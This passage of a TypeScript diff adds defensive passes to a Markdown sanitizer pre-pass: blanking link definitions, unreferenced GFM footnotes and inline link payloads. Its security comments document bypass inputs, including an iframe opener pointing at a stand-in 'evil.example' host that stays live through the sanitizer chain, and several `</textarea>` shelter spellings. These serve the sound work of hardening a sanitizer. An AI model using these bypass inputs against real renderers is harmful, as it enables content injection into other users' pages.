|
|
1641
|
+
* returned true and a prose `<textarea>` above stayed LIVE. Reproduced
|
|
1642
|
+
* byte-identical for `[a]: /x "</textarea>"`, `[a]: </textarea>`, the
|
|
1643
|
+
* multi-line spellings (round 19), the backslash-escaped delimiters and the
|
|
1644
|
+
* multi-line label/title (round 21).
|
|
1645
|
+
*
|
|
1646
|
+
* FAIL DIRECTION: blank the WHOLE line on a definition-SHAPED match, without
|
|
1647
|
+
* modelling "a definition may not interrupt a paragraph". Over-blanking here can
|
|
1648
|
+
* only hide closers, i.e. escape MORE openers — the fail-CLOSED direction — so
|
|
1649
|
+
* the loose shape is the correct bias.
|
|
1650
|
+
*
|
|
1651
|
+
* FOOTNOTES ARE EXCLUDED (round 19). The label rejects a leading `^`: a GFM
|
|
1652
|
+
* footnote definition's content is BLOCK-parsed and may contain REAL html.
|
|
1653
|
+
*
|
|
1654
|
+
* CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankComments` — the shape absorbs
|
|
1655
|
+
* an optional blockquote run and one list marker, so a definition written inside
|
|
1656
|
+
* a quote or ON a list-marker line is covered by the SINGLE top-level call.
|
|
1657
|
+
*/
|
|
1658
|
+
function blankLinkDefinitions(masked: string, lines: MaskLine[]): string {
|
|
1659
|
+
const ranges: Array<[number, number]> = []
|
|
1660
|
+
const blankLine = (line: MaskLine): void => {
|
|
1661
|
+
ranges.push([line.contentStart, line.contentStart + line.content.length])
|
|
1662
|
+
}
|
|
1663
|
+
|
|
1664
|
+
/**
|
|
1665
|
+
* THE ONE GIVE-UP CHANNEL. A construct already recognized as a definition can
|
|
1666
|
+
* only ever stop blanking at CommonMark's own bound for it — the next blank
|
|
1667
|
+
* line — never by declining. Returns the index of the last line blanked.
|
|
1668
|
+
* `stop` lets a caller end EARLY on a line it recognises (a closing title
|
|
1669
|
+
* delimiter); returning false everywhere degrades to "blank to the bound",
|
|
1670
|
+
* which is the default this channel exists to guarantee.
|
|
1671
|
+
*/
|
|
1672
|
+
const blankLinesToParagraphBound = (from: number, stop: (c: string) => boolean): number => {
|
|
1673
|
+
let k = from
|
|
1674
|
+
for (; k < lines.length; k++) {
|
|
1675
|
+
const c = stripCr(lines[k].content)
|
|
1676
|
+
if (isBlankLine(c)) break
|
|
1677
|
+
blankLine(lines[k])
|
|
1678
|
+
if (stop(c)) {
|
|
1679
|
+
k++
|
|
1680
|
+
break
|
|
1681
|
+
}
|
|
1682
|
+
}
|
|
1683
|
+
return k - 1
|
|
1684
|
+
}
|
|
1685
|
+
|
|
1686
|
+
let i = 0
|
|
1687
|
+
while (i < lines.length) {
|
|
1688
|
+
const line = lines[i]
|
|
1689
|
+
if (line.content.indexOf('[') === -1) {
|
|
1690
|
+
i++
|
|
1691
|
+
continue
|
|
1692
|
+
}
|
|
1693
|
+
const open = LINK_DEF_OPEN_RE.exec(line.content)
|
|
1694
|
+
if (!open) {
|
|
1695
|
+
i++
|
|
1696
|
+
continue
|
|
1697
|
+
}
|
|
1698
|
+
const close = findLabelClose(lines, i, open[0].length)
|
|
1699
|
+
if ('stoppedAt' in close) {
|
|
1700
|
+
i = Math.max(close.stoppedAt, i + 1)
|
|
1701
|
+
continue
|
|
1702
|
+
}
|
|
1703
|
+
const head = stripCr(lines[close.line].content)
|
|
1704
|
+
let tail = parseDefTail(head, close.colon + 1)
|
|
1705
|
+
// A late RECOGNITION verdict unwinds the WHOLE construct: remark emits every
|
|
1706
|
+
// line of it as text, so nothing may be blanked.
|
|
1707
|
+
if (tail.k === 'decline') {
|
|
1708
|
+
i = Math.max(close.line, i + 1)
|
|
1709
|
+
continue
|
|
1710
|
+
}
|
|
1711
|
+
// COMMITTED. From here every exit blanks.
|
|
1712
|
+
for (let j = i; j <= close.line; j++) blankLine(lines[j])
|
|
1713
|
+
let j = close.line
|
|
1714
|
+
while (tail.k !== 'done') {
|
|
1715
|
+
if (tail.k === 'openTitle') {
|
|
1716
|
+
const closer = tail.close
|
|
1717
|
+
j = blankLinesToParagraphBound(j + 1, (c) => findUnescaped(c, 0, closer) !== -1)
|
|
1718
|
+
break
|
|
1719
|
+
}
|
|
1720
|
+
const k = j + 1
|
|
1721
|
+
if (k >= lines.length) break
|
|
1722
|
+
const c = stripCr(lines[k].content)
|
|
1723
|
+
if (isBlankLine(c)) break
|
|
1724
|
+
const at = contPrefixLen(c)
|
|
1725
|
+
const next: DefTail =
|
|
1726
|
+
tail.k === 'needDest' ? parseDefTail(c, at) : parseTitleTail(c, skipSpaces(c, at))
|
|
1727
|
+
// The definition is already COMPLETE without this line (a destination-only
|
|
1728
|
+
// definition needs no title; a `[a]:` with no parseable destination is not
|
|
1729
|
+
// a definition at all and remark emits the following line as text), so this
|
|
1730
|
+
// is a RECOGNITION boundary, not a give-up.
|
|
1731
|
+
if (next.k === 'decline') break
|
|
1732
|
+
blankLine(lines[k])
|
|
1733
|
+
j = k
|
|
1734
|
+
tail = next
|
|
1735
|
+
}
|
|
1736
|
+
i = j + 1
|
|
1737
|
+
}
|
|
1738
|
+
return blankRanges(masked, mergeRanges(ranges))
|
|
1739
|
+
}
|
|
1740
|
+
|
|
1741
|
+
/**
|
|
1742
|
+
* `[^` after the container prefix — a GFM FOOTNOTE definition opener, the shape
|
|
1743
|
+
* `LINK_DEF_OPEN_RE`'s `\[(?!\^)` deliberately refuses.
|
|
1744
|
+
*
|
|
1745
|
+
* The prefix absorbs a blockquote run and ANY NUMBER of list markers, where
|
|
1746
|
+
* `LINK_DEF_CONTAINER_PREFIX` stops at one. It has to: this pass is called ONCE
|
|
1747
|
+
* at top level (its reference set is document-global, so it cannot be re-run on
|
|
1748
|
+
* a container pass's stripped run the way `blankLinkDefinitions` is), and the
|
|
1749
|
+
* sweep found `- - [^zz]: … </textarea>` swallowing live at depth 2. Over-
|
|
1750
|
+
* detection is fail-CLOSED here — an unreferenced footnote is emitted by
|
|
1751
|
+
* nothing, so blanking more of one costs nothing at all.
|
|
1752
|
+
*
|
|
1753
|
+
* THE MARKER GROUP CARRIES NO LEADING WHITESPACE QUANTIFIER, deliberately. The
|
|
1754
|
+
* indent is matched ONCE before the group and afterwards only by each marker's
|
|
1755
|
+
* OWN trailing `[ \t]{1,16}`, so no two quantifiers ever compete for the same
|
|
1756
|
+
* whitespace run and a gap has exactly one viable split. The naive spelling
|
|
1757
|
+
* (`(?:[ \t]{0,16}marker[ \t]{1,16})*`) splits a 2-space gap two ways and
|
|
1758
|
+
* backtracks 2^depth on a NON-matching line — `- - - …x` is ordinary prose.
|
|
1759
|
+
*/
|
|
1760
|
+
const FOOTNOTE_DEF_OPEN_RE = new RegExp(
|
|
1761
|
+
'^ {0,3}(?:>[ \\t]?)*[ \\t]{0,16}(?:(?:[-*+]|\\d{1,9}[.)])[ \\t]{1,16})*\\[\\^',
|
|
1762
|
+
)
|
|
1763
|
+
/** A blockquote run, WITHOUT swallowing the indent after it — the footnote-body
|
|
1764
|
+
* continuation test has to MEASURE that indent, which `contPrefixLen` eats. */
|
|
1765
|
+
const FOOTNOTE_QUOTE_PREFIX_RE = / {0,3}(?:>[ \t]?)*/y
|
|
1766
|
+
|
|
1767
|
+
/**
|
|
1768
|
+
* micromark's `normalizeIdentifier`, byte-for-byte: collapse every whitespace
|
|
1769
|
+
* run to one space, trim, then case-fold via `toLowerCase().toUpperCase()` (the
|
|
1770
|
+
* double fold is what makes ß/ẞ and the Turkish dotted I agree). A reference and
|
|
1771
|
+
* a definition are the SAME footnote exactly when these agree, so matching on
|
|
1772
|
+
* anything looser (raw slices) would call a resolved footnote unreferenced.
|
|
1773
|
+
*/
|
|
1774
|
+
function normalizeFootnoteLabel(label: string): string {
|
|
1775
|
+
return label
|
|
1776
|
+
.replace(/[\t\n\r ]+/g, ' ')
|
|
1777
|
+
.replace(/^ | $/g, '')
|
|
1778
|
+
.toLowerCase()
|
|
1779
|
+
.toUpperCase()
|
|
1780
|
+
}
|
|
1781
|
+
|
|
1782
|
+
/** End index of the label opened by `[^` at `open`, i.e. the index of its
|
|
1783
|
+
* closing `]`, or -1. Escape-aware and single-line, like the construct. An
|
|
1784
|
+
* unescaped `[` inside voids the label exactly as it does for a link label. */
|
|
1785
|
+
function footnoteLabelEnd(c: string, open: number): number {
|
|
1786
|
+
for (let q = open + 2; q < c.length; q = skipEscaped(c, q)) {
|
|
1787
|
+
if (c[q] === '[') return -1
|
|
1788
|
+
if (c[q] === ']') return q
|
|
1789
|
+
}
|
|
1790
|
+
return -1
|
|
1791
|
+
}
|
|
1792
|
+
|
|
1793
|
+
/**
|
|
1794
|
+
* Blank UNREFERENCED GFM FOOTNOTE DEFINITIONS (round 22 — SECURITY).
|
|
1795
|
+
*
|
|
1796
|
+
* Round 19 excluded `[^label]:` from `blankLinkDefinitions` and wrote the
|
|
1797
|
+
* reason on the exit: a footnote's body is BLOCK-parsed and may hold REAL html,
|
|
1798
|
+
* so blanking it would hide a genuine closer and over-escape a genuine element.
|
|
1799
|
+
* That reason is true of a REFERENCED footnote and FALSE of an unreferenced one:
|
|
1800
|
+
* `remark-gfm` resolves definitions against references and DROPS a definition
|
|
1801
|
+
* nothing points at, emitting no node and no footnote section for it. Nothing in
|
|
1802
|
+
* its body reaches the document — but the whole line stayed live in the closer
|
|
1803
|
+
* haystack, `hasLaterCloser` returned true, and the prose opener above it was
|
|
1804
|
+
* left UNESCAPED. Reproduced end-to-end through the real
|
|
1805
|
+
* `escapeUnknownHtmlTags → remarkGfm → rehypeRaw → rehypeSanitize` chain:
|
|
1806
|
+
*
|
|
1807
|
+
* Secret prose.
|
|
1808
|
+
*
|
|
1809
|
+
* <iframe src="https://evil.example/x" width="600">
|
|
1810
|
+
*
|
|
1811
|
+
* visible text
|
|
1812
|
+
*
|
|
1813
|
+
* [^f]: note body </iframe>
|
|
1814
|
+
*
|
|
1815
|
+
* → `<p>Secret prose.</p><iframe src="https://evil.example/x" width="600">
|
|
1816
|
+
* visible text</iframe>` — a LIVE iframe keeping both attributes and swallowing
|
|
1817
|
+
* the prose below. Delete the footnote line and the same input escapes
|
|
1818
|
+
* correctly. The lesson the round generalises: a RECOGNITION decline's
|
|
1819
|
+
* justification must hold for EVERY sub-case of the construct, not the common
|
|
1820
|
+
* one.
|
|
1821
|
+
*
|
|
1822
|
+
* SO THE DECLINE IS NARROWED, NOT DROPPED. A definition whose label IS
|
|
1823
|
+
* referenced keeps round 19's treatment (untouched, body live). A definition
|
|
1824
|
+
* whose label is referenced NOWHERE is blanked with its body. That blanking is
|
|
1825
|
+
* EXACT for every reference the mask can see — remark emits NONE of those bytes
|
|
1826
|
+
* — and OVER-blanks only where an earlier pass has already hidden a REAL
|
|
1827
|
+
* reference, which is the fail-CLOSED direction. (Round 23 checked the claim in
|
|
1828
|
+
* the over-blank direction, where the older "EXACT, not merely fail-closed"
|
|
1829
|
+
* wording was false: `blankLinkDefinitions`' `openTitle` exit blanks to the
|
|
1830
|
+
* paragraph bound, but an unclosed title makes CommonMark REJECT the definition
|
|
1831
|
+
* and read the run as a PARAGRAPH, whose `[^f]` is a genuine reference. Executed:
|
|
1832
|
+
* `[a]: /x "unclosed` + a lazy line holding `[^f]` + `[^f]: body </textarea>`
|
|
1833
|
+
* escapes its opener even though remark renders the closer live. Cosmetic, and
|
|
1834
|
+
* on the safe side — but do not re-read the sentence as a proof that it cannot
|
|
1835
|
+
* happen.)
|
|
1836
|
+
*
|
|
1837
|
+
* THE PASS READS TWO SOURCES, and the split is the security-load-bearing part
|
|
1838
|
+
* (round 23 — this pass's own fail-open):
|
|
1839
|
+
*
|
|
1840
|
+
* DEFINITIONS come from the CURRENT MASK (`text`). A definition line hidden
|
|
1841
|
+
* by an earlier pass is simply not seen, which leaves it in the haystack —
|
|
1842
|
+
* round 19's behaviour, the direction this pass was already in.
|
|
1843
|
+
*
|
|
1844
|
+
* REFERENCES come from a SEPARATE, MORE-BLANKED scratch copy (`refText`,
|
|
1845
|
+
* built by `footnoteReferenceMask`). Round 22 counted them on the current
|
|
1846
|
+
* mask and justified it with "a `[^f]` written inside code has already been
|
|
1847
|
+
* blanked" plus "a phantom reference degrades to round 19's behaviour, never
|
|
1848
|
+
* worse". Both sentences are true of CODE and FALSE of every region remark
|
|
1849
|
+
* consumes into an ATTRIBUTE or drops entirely: at this point in the pipeline
|
|
1850
|
+
* `blankInlineLinkPayloads`, `blankBracketLabels` and `blankComments` have
|
|
1851
|
+
* not run yet, so a `[^f]` written in an image ALT, a full-reference LABEL,
|
|
1852
|
+
* an inline link TITLE or angle DESTINATION, an HTML COMMENT or a raw HTML
|
|
1853
|
+
* BLOCK counted as a live reference. remark resolves NONE of those — the
|
|
1854
|
+
* definition it points at is dropped and never becomes document text — so
|
|
1855
|
+
* the phantom kept the definition (and its `</textarea>`) in the closer
|
|
1856
|
+
* haystack, `hasLaterCloser` returned true and the opener above stayed LIVE.
|
|
1857
|
+
* That is a fail-OPEN, not a degradation: TEN spellings reproduced a live
|
|
1858
|
+
* `<textarea>` (or, with an attribute-bearing `<iframe>` opener, a live
|
|
1859
|
+
* iframe) end-to-end. Verified phantom-ness independently —
|
|
1860
|
+
* `visible text ![x [^f] y](/i.png)` + `[^f]: body` emits NO `data-footnotes`
|
|
1861
|
+
* section at all, while the same input with a real reference does.
|
|
1862
|
+
*
|
|
1863
|
+
* The scratch copy may over-blank freely: counting FEWER references only
|
|
1864
|
+
* blanks MORE definitions, which is the fail-CLOSED direction.
|
|
1865
|
+
*
|
|
1866
|
+
* CONTAINER-NESTED CODE IS NOT A HOLE — round 22's hedge ("a reference inside
|
|
1867
|
+
* such a region still counts, because the container passes run AFTER this one")
|
|
1868
|
+
* was over-pessimistic and is retracted. MEASURED, with a type-6 opener so the
|
|
1869
|
+
* shape is not confounded by the opener's own HTML block: a `[^f]` inside a
|
|
1870
|
+
* blockquoted fence, a list-item fence at content column 2 AND at 4, a
|
|
1871
|
+
* quoted-list fence, a top-level fence and indented code all render 0 live
|
|
1872
|
+
* elements — every one of those regions is ALREADY blanked by
|
|
1873
|
+
* `blankFencedRegions` / `blankIndentedCode` before this pass reads the mask.
|
|
1874
|
+
*
|
|
1875
|
+
* THE ONE NAMED RESIDUAL is TRANSITIVE: a reference that exists ONLY inside
|
|
1876
|
+
* ANOTHER, itself-unreferenced, definition's body (`[^a]: see [^f]` with nothing
|
|
1877
|
+
* referencing `a`). remark drops both definitions, so `[^f]`'s is a phantom too,
|
|
1878
|
+
* but this pass counts references ONCE and would need a FIXPOINT (blank, rebuild
|
|
1879
|
+
* the ref-mask, recount) to see it. Deliberately not built: the loop is
|
|
1880
|
+
* unbounded in the number of definitions, and the shape needs an attacker to
|
|
1881
|
+
* plant a second dead definition. Reproduced and left standing knowingly — if it
|
|
1882
|
+
* is ever closed, close it with a bounded iteration count, not an unbounded one.
|
|
1883
|
+
*
|
|
1884
|
+
* BODY BOUND: the label line, its LAZY paragraph continuation lines, and any
|
|
1885
|
+
* further blocks indented >= 4 columns past the blockquote run — GFM's own
|
|
1886
|
+
* "content of a footnote is what an indented continuation would give a list
|
|
1887
|
+
* item". The walk stops at a de-indented line after a blank one, and at another
|
|
1888
|
+
* footnote-definition line, so a following REFERENCED footnote is not
|
|
1889
|
+
* over-blanked into escaped source.
|
|
1890
|
+
*
|
|
1891
|
+
* CONTAINER-AGNOSTIC BY CONSTRUCTION, and MORE so than `blankLinkDefinitions`:
|
|
1892
|
+
* the reference set is document-GLOBAL, so unlike that pass this one cannot be
|
|
1893
|
+
* re-run on a container pass's stripped run to reach deeper nesting. Its opener
|
|
1894
|
+
* prefix therefore absorbs any number of list markers itself (see
|
|
1895
|
+
* `FOOTNOTE_DEF_OPEN_RE`), and the single top-level call covers every depth.
|
|
1896
|
+
*/
|
|
1897
|
+
function blankUnreferencedFootnotes(masked: string, lines: MaskLine[], folded: string): string {
|
|
1898
|
+
// `[^` is rare and the whole pass is a no-op without one, so one native scan
|
|
1899
|
+
// buys the overwhelming majority of documents a total skip. This pass runs
|
|
1900
|
+
// over EVERY line of the document; without the guard and the `indexOf` walk
|
|
1901
|
+
// below it would be the most expensive one in the mask, for a construct
|
|
1902
|
+
// almost nothing contains (measured: no regression at 989 KB on a corpus with
|
|
1903
|
+
// no footnotes at all).
|
|
1904
|
+
if (masked.indexOf('[^') === -1) return masked
|
|
1905
|
+
// The MASK's text for a line, sliced on demand. `remapToMask` would allocate a
|
|
1906
|
+
// second object per line of the whole document for a pass that usually touches
|
|
1907
|
+
// one of them.
|
|
1908
|
+
const text = (line: MaskLine): string =>
|
|
1909
|
+
stripCr(masked.slice(line.contentStart, line.contentStart + line.content.length))
|
|
1910
|
+
// …and the REFERENCE-ONLY copy, blanked further (see `footnoteReferenceMask`).
|
|
1911
|
+
// Built ONLY past the `[^` guard, so a document without footnotes pays nothing.
|
|
1912
|
+
// Length-preserving like every other mask, so an index means the same byte in
|
|
1913
|
+
// both copies.
|
|
1914
|
+
const refMask = footnoteReferenceMask(masked, folded)
|
|
1915
|
+
const refText = (line: MaskLine): string =>
|
|
1916
|
+
stripCr(refMask.slice(line.contentStart, line.contentStart + line.content.length))
|
|
1917
|
+
|
|
1918
|
+
// PASS 1 — the DEFINITION on each line (from the mask) and every `[^label]`
|
|
1919
|
+
// that is a REFERENCE (from the ref-mask). A group is a DEFINITION only where
|
|
1920
|
+
// the line-anchored opener shape puts it AND a `:` follows; every other
|
|
1921
|
+
// `[^…]`, including a mid-line `see [^f]: here`, is a reference to remark.
|
|
1922
|
+
// Occurrences are reached with `indexOf`, never a per-character walk: the pass
|
|
1923
|
+
// runs over EVERY line of the document and a char walk would make it the most
|
|
1924
|
+
// expensive one in the mask for a construct almost no line contains.
|
|
1925
|
+
const referenced = new Set<string>()
|
|
1926
|
+
const defAt: Array<number | null> = []
|
|
1927
|
+
for (const line of lines) {
|
|
1928
|
+
const c = text(line)
|
|
1929
|
+
let isDef: number | null = null
|
|
1930
|
+
if (c.indexOf('[^') !== -1) {
|
|
1931
|
+
const open = FOOTNOTE_DEF_OPEN_RE.exec(c)
|
|
1932
|
+
if (open !== null) {
|
|
1933
|
+
// The opener is line-anchored past a whitespace/marker prefix, so its
|
|
1934
|
+
// `[` can never carry a backslash escape — the prefix would not match.
|
|
1935
|
+
const defOpen = open[0].length - 2
|
|
1936
|
+
const end = footnoteLabelEnd(c, defOpen)
|
|
1937
|
+
if (end !== -1 && c[end + 1] === ':') isDef = defOpen
|
|
1938
|
+
}
|
|
1939
|
+
}
|
|
1940
|
+
defAt.push(isDef)
|
|
1941
|
+
const rc = refText(line)
|
|
1942
|
+
for (let q = rc.indexOf('[^'); q !== -1; q = rc.indexOf('[^', q)) {
|
|
1943
|
+
// Escape-aware without the walk: an ODD run of backslashes before the `[`
|
|
1944
|
+
// escapes it, an EVEN one is escaped backslashes and leaves `[` live.
|
|
1945
|
+
let back = q
|
|
1946
|
+
while (back > 0 && rc[back - 1] === '\\') back--
|
|
1947
|
+
if ((q - back) % 2 === 1) {
|
|
1948
|
+
q += 2
|
|
1949
|
+
continue
|
|
1950
|
+
}
|
|
1951
|
+
const end = footnoteLabelEnd(rc, q)
|
|
1952
|
+
if (end === -1) break
|
|
1953
|
+
if (q !== isDef) referenced.add(normalizeFootnoteLabel(rc.slice(q + 2, end)))
|
|
1954
|
+
q = end + 1
|
|
1955
|
+
}
|
|
1956
|
+
}
|
|
1957
|
+
|
|
1958
|
+
// PASS 2 — blank each definition whose label nothing references, body included.
|
|
1959
|
+
// Slices the REAL mask, never the ref-mask.
|
|
1960
|
+
const ranges: Array<[number, number]> = []
|
|
1961
|
+
for (let i = 0; i < lines.length; i++) {
|
|
1962
|
+
const at = defAt[i]
|
|
1963
|
+
if (at === null) continue
|
|
1964
|
+
const head = text(lines[i])
|
|
1965
|
+
const end = footnoteLabelEnd(head, at)
|
|
1966
|
+
if (referenced.has(normalizeFootnoteLabel(head.slice(at + 2, end)))) continue
|
|
1967
|
+
let j = i
|
|
1968
|
+
let sawBlank = false
|
|
1969
|
+
for (let k = i + 1; k < lines.length; k++) {
|
|
1970
|
+
const c = text(lines[k])
|
|
1971
|
+
if (isBlankLine(c)) {
|
|
1972
|
+
sawBlank = true
|
|
1973
|
+
continue
|
|
1974
|
+
}
|
|
1975
|
+
// A second definition ends this one; over-blanking a REFERENCED
|
|
1976
|
+
// neighbour's body would show it as escaped source (cosmetic, but avoidable).
|
|
1977
|
+
if (defAt[k] !== null) break
|
|
1978
|
+
// After a blank line only an INDENTED block continues the footnote; before
|
|
1979
|
+
// one, any non-blank line is a lazy paragraph continuation.
|
|
1980
|
+
if (sawBlank && footnoteIndentCols(c) < 4) break
|
|
1981
|
+
j = k
|
|
1982
|
+
}
|
|
1983
|
+
for (let k = i; k <= j; k++) {
|
|
1984
|
+
const line = lines[k]
|
|
1985
|
+
ranges.push([line.contentStart, line.contentStart + line.content.length])
|
|
1986
|
+
}
|
|
1987
|
+
}
|
|
1988
|
+
return blankRanges(masked, mergeRanges(ranges))
|
|
1989
|
+
}
|
|
1990
|
+
|
|
1991
|
+
/**
|
|
1992
|
+
* The REFERENCE-COUNTING copy of the mask for `blankUnreferencedFootnotes`
|
|
1993
|
+
* (round 23 — SECURITY, that pass's own fail-open).
|
|
1994
|
+
*
|
|
1995
|
+
* A `[^f]` only makes a definition REFERENCED if remark resolves it as a
|
|
1996
|
+
* reference. Everything remark consumes into an ATTRIBUTE or drops outright is
|
|
1997
|
+
* a PHANTOM, and at this point in the pipeline none of those regions are masked
|
|
1998
|
+
* yet, so this copy applies the four passes that hide them:
|
|
1999
|
+
*
|
|
2000
|
+
* `blankInlineLinkPayloads` — an inline link/image DESTINATION or TITLE
|
|
2001
|
+
* (`[a](/x "[^f]")`, `[a](<[^f]>)`, ``) becomes href/title.
|
|
2002
|
+
* `blankBracketLabels`, WITHOUT its footnote-label ranges — an image ALT
|
|
2003
|
+
* (`![[^f]](/i.png)`) and a full-reference LABEL (`[txt][[^f]]`) become an
|
|
2004
|
+
* attribute or an identifier. The `[^…]` ranges MUST be excluded: that pass
|
|
2005
|
+
* blanks a footnote label "reference AND definition alike", which here
|
|
2006
|
+
* would erase EVERY real reference and over-blank every referenced
|
|
2007
|
+
* definition into escaped source.
|
|
2008
|
+
* HTML BLOCK ranges — inside a `<div>` … block the line `[^f]` is raw HTML
|
|
2009
|
+
* content, not a reference. Reuses `computeHtmlBlockRanges`, the module's
|
|
2010
|
+
* own CommonMark block model, so this copy cannot disagree with the carve.
|
|
2011
|
+
* `blankComments` — `<!-- [^f] -->` is dropped entirely. LAST, as everywhere
|
|
2012
|
+
* else, because it scans the masked copy. (The pipeline's own comment pass
|
|
2013
|
+
* still runs last over the REAL mask; this is a separate string.)
|
|
2014
|
+
*
|
|
2015
|
+
* OVER-BLANKING HERE IS FREE: fewer references means more definitions look
|
|
2016
|
+
* unreferenced, which blanks MORE of the haystack — the fail-CLOSED direction.
|
|
2017
|
+
* That is why this copy may apply passes out of the pipeline's order and may
|
|
2018
|
+
* use a block model that only approximates remark's.
|
|
2019
|
+
*/
|
|
2020
|
+
function footnoteReferenceMask(masked: string, folded: string): string {
|
|
2021
|
+
let ref = blankInlineLinkPayloads(masked, folded)
|
|
2022
|
+
ref = blankBracketLabels(ref, folded, { footnoteLabels: false })
|
|
2023
|
+
ref = blankRanges(
|
|
2024
|
+
ref,
|
|
2025
|
+
mergeRanges(computeHtmlBlockRanges(folded).map(({ start, end }) => [start, end])),
|
|
2026
|
+
)
|
|
2027
|
+
ref = blankComments(ref, ref)
|
|
2028
|
+
ref = ref.replace(AUTOLINK_LIKE_RE, (m) => ' '.repeat(m.length))
|
|
2029
|
+
return blankTagAttributes(ref)
|
|
2030
|
+
}
|
|
2031
|
+
|
|
2032
|
+
/** AUTOLINKS, both spellings, DELIBERATELY over-wide (this regex is only ever
|
|
2033
|
+
* applied to the reference-counting copy, where over-blanking is free): a
|
|
2034
|
+
* CommonMark `<scheme:…>` autolink and a GFM LITERAL autolink both become an
|
|
2035
|
+
* `href`, so `<https://e.example/[^f]>` and `https://e.example/x[^f]y` are
|
|
2036
|
+
* phantom references — each reproduced a live iframe. It stops at whitespace,
|
|
2037
|
+
* so an ordinary `see https://e.example [^f]` keeps its REAL reference. Email
|
|
2038
|
+
* autolinks are deliberately absent: a `[` voids the email shape, so `[^f]`
|
|
2039
|
+
* inside one IS a real reference (verified — remark emits the footnote). */
|
|
2040
|
+
const AUTOLINK_LIKE_RE = /<[a-z][a-z0-9+.-]{1,31}:[^\s<>]*>|(?:https?:\/\/|www\.)[^\s<]*/gi
|
|
2041
|
+
|
|
2042
|
+
/** Blank the ATTRIBUTE RUN of every tag-like span, length-preserving. Blanking
|
|
2043
|
+
* the WHOLE tag would blank real `</tag>` closers too, so only the run between
|
|
2044
|
+
* the tag name and the `>` is cleared. Shared by `buildCloserHaystack`'s final
|
|
2045
|
+
* step and by `footnoteReferenceMask`, where an INLINE tag's attribute is one
|
|
2046
|
+
* more region remark never resolves a `[^f]` in (`<span title="[^f]">`
|
|
2047
|
+
* reproduced a live iframe). */
|
|
2048
|
+
function blankTagAttributes(masked: string): string {
|
|
2049
|
+
return masked.replace(
|
|
2050
|
+
TAG_LIKE_REGEX,
|
|
2051
|
+
(_m, slash: string, tag: string, rest: string, selfClose: string) =>
|
|
2052
|
+
`<${slash}${tag}${' '.repeat(rest.length)}${selfClose}>`,
|
|
2053
|
+
)
|
|
2054
|
+
}
|
|
2055
|
+
|
|
2056
|
+
/** Leading indent of `c` in COLUMNS (tabs advance to the next multiple of 4)
|
|
2057
|
+
* measured PAST the blockquote run, which is the column GFM measures a
|
|
2058
|
+
* footnote's continuation blocks at. */
|
|
2059
|
+
function footnoteIndentCols(c: string): number {
|
|
2060
|
+
FOOTNOTE_QUOTE_PREFIX_RE.lastIndex = 0
|
|
2061
|
+
let q = FOOTNOTE_QUOTE_PREFIX_RE.exec(c)![0].length
|
|
2062
|
+
let col = 0
|
|
2063
|
+
for (; q < c.length && isSpaceTab(c[q]); q++) col = c[q] === '\t' ? col + 4 - (col % 4) : col + 1
|
|
2064
|
+
return col
|
|
2065
|
+
}
|
|
2066
|
+
|
|
2067
|
+
/**
|
|
2068
|
+
* Blank the PARENTHESISED PAYLOAD of an INLINE link or image (round 19 —
|
|
2069
|
+
* SECURITY, a whole shelter class the table did not name).
|
|
2070
|
+
*
|
|
2071
|
+
* remark consumes an inline link's DESTINATION and TITLE exactly as it consumes
|
|
2072
|
+
* a reference definition's: both become href/title ATTRIBUTES on the emitted
|
|
2073
|
+
* node and never reach the document as HTML. So a `</textarea>` written in
|
|
2074
|
+
* either one is not a closer — but `blankLinkDefinitions` only covers the
|
|
2075
|
+
* DEFINITION spelling, and no pass covered the inline one. All eight spellings
|
|
2076
|
+
* reproduced live (`escapeUnknownHtmlTags` byte-identical, one live
|
|
2077
|
+
* `<textarea>` swallowing the prose above it):
|
|
2078
|
+
*
|
|
2079
|
+
* [a](/x "</textarea>") [a](/x '</textarea>') [a](/x (</textarea>))
|
|
2080
|
+
*  [a](</textarea>) > [a](/x "</textarea>")
|
|
2081
|
+
* - [a](/x "</textarea>") See [a](/x "</textarea>") for more.
|
|
2082
|
+
*
|
|
2083
|
+
* …and the escalation: an `<iframe src="…" width="600">` opener plus a title
|
|
2084
|
+
* shelter yields a LIVE iframe retaining both attributes.
|
|
2085
|
+
*
|
|
2086
|
+
* ONLY THE PAYLOAD IS BLANKED HERE, never the `[…]` text of an INLINE LINK
|
|
2087
|
+
* (`[text](dest)`). That text is INLINE-PARSED and reaches the document as
|
|
2088
|
+
* HTML, so blanking it would over-escape a paired `<textarea>…</textarea>`
|
|
2089
|
+
* written inside a link label. The bracket text of every OTHER spelling — an
|
|
2090
|
+
* IMAGE's alt, a reference LABEL, a footnote LABEL — is consumed into an
|
|
2091
|
+
* attribute or an identifier instead, and is blanked by `blankBracketLabels`
|
|
2092
|
+
* below. Round 20 found that half uncovered.
|
|
2093
|
+
*
|
|
2094
|
+
* CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankLinkDefinitions` and
|
|
2095
|
+
* `blankComments`: the scan is anchored on the `](` bigram with no column or
|
|
2096
|
+
* prefix anchoring, so a blockquote run or list marker is ordinary text ahead of
|
|
2097
|
+
* it and the single top-level call covers every container nesting.
|
|
2098
|
+
*
|
|
2099
|
+
* FAIL DIRECTION: blanks ONLY on a payload that parses through to its closing
|
|
2100
|
+
* `)`. A shape that does not parse is not a link to remark either, so its
|
|
2101
|
+
* `</textarea>` IS a real closer and must stay visible — declining to blank is
|
|
2102
|
+
* the correct answer there, not a gap. Conversely the parse is deliberately
|
|
2103
|
+
* LOOSER than CommonMark (it accepts payloads remark would reject, e.g. after a
|
|
2104
|
+
* `](`-shaped bigram in ordinary prose), and every such over-detection only
|
|
2105
|
+
* hides closers, i.e. escapes MORE openers.
|
|
2106
|
+
*
|
|
2107
|
+
* THE CAP IS A BLANKING BOUNDARY, NOT A REJECTION (round 20 — SECURITY).
|
|
2108
|
+
* `INLINE_LINK_PAYLOAD_MAX` bounds how far one `](` may blank, so a stray
|
|
2109
|
+
* bigram cannot blank an unbounded tail. It was originally spent as `return -1`
|
|
2110
|
+
* on every over-limit exit, which the caller reads as "not a link, leave
|
|
2111
|
+
* visible" — so `[a](/x "<1100 chars></textarea>")` sheltered its closer in
|
|
2112
|
+
* full view of the mask (`escapeUnknownHtmlTags` byte-identical, one live
|
|
2113
|
+
* RAWTEXT element; the `<iframe src=… width=…>` spelling kept both attributes).
|
|
2114
|
+
* CommonMark places NO length bound on a destination or a title, so that is
|
|
2115
|
+
* ordinary output, and this is the SAME fail-open shape `ba4a526b` closed for
|
|
2116
|
+
* over-cap inline code spans, reintroduced in newer code.
|
|
2117
|
+
*
|
|
2118
|
+
